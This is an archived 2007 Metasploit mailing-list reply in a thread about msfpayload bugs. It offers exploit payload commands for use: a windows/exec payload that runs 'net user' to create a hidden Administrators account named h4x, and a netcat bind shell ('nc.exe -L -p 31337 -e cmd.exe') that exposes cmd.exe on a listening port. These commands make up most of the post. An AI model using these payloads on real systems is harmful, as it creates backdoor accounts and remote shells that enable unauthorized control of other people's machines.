Metasploit mailing list archives

Bugs in msfpayload

From: patrick at aushack.com (Patrick Webster)
Date: Wed, 5 Sep 2007 17:23:52 +1000

For Q3,

you could just use:

set PAYLOAD windows/exec
set CMD "net user h4x passw0rd /add && net localgroup Administrators h4x
/add" (should work but untested)

and swap the Administrators group with whatever you want.

But for your exploit, why not just compile an exe that calls netcat and
binds to cmd.exe?

system("nc.exe -L -p 31337 -e cmd.exe")

and so on.

Oh and check out http://www.metasploit.com/archive/framework/msg02376.html -
the payload probably requires use of some registers.

-Patrick
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070905/3273ab7c/attachment.htm>

Current thread:

Bugs in msfpayload Nicob (Sep 04)
- Bugs in msfpayload Patrick Webster (Sep 05)
- Bugs in msfpayload H D Moore (Sep 05)
  - Bugs in msfpayload Nicob (Sep 05)